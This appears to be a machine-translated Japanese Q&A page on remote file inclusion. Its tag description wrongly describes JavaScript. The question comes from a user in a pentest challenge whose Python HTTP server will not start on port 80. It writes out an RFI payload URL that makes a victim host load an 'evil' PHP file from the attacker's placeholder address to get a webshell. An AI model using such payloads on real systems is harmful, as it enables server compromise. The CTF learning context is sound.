問題タブ [remote-file-inclusion]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
python - リモートファイルインクルージョン演習でpython http.serverモジュールがポート80で動作しない
私はペンテスト チャレンジを行っており、リモート ファイル インクルージョンの脆弱性を介してアクセスを取得する必要がある 1 台のマシンで作業しています。過去に、マシンに悪意のあるファイルを含めることで Webshell を入手することができました。私はpython http.serverモジュール(sudo python3 -m http.server 80)を使用してそうしましたが、これは完全にうまくいきました。ただし、初めて正常に実行した後、このコマンドを再度実行しようとしましたが、実行するたびに次のエラーが発生します。
これは、何かがすでにポート 80 を使用していることを示しているようですが、Web ブラウザを閉じるときに lsof -i :80 を使用して確認し、マシンを再起動しても機能しません。また、別のポート ( http://VICTIMIP/path/to/file.php?vuln_param=http://MYIP:4444/path/to/evil/file.php ) 経由でファイルを含めようとしましたが、これはできません動作しません。前進する方法について誰かアドバイスをいただけますか?なぜhttpサーバーがポート80で動作しないのか、RFIがポート80でしか動作しないのか? 現時点では、他に試すことができることは本当に考えられません。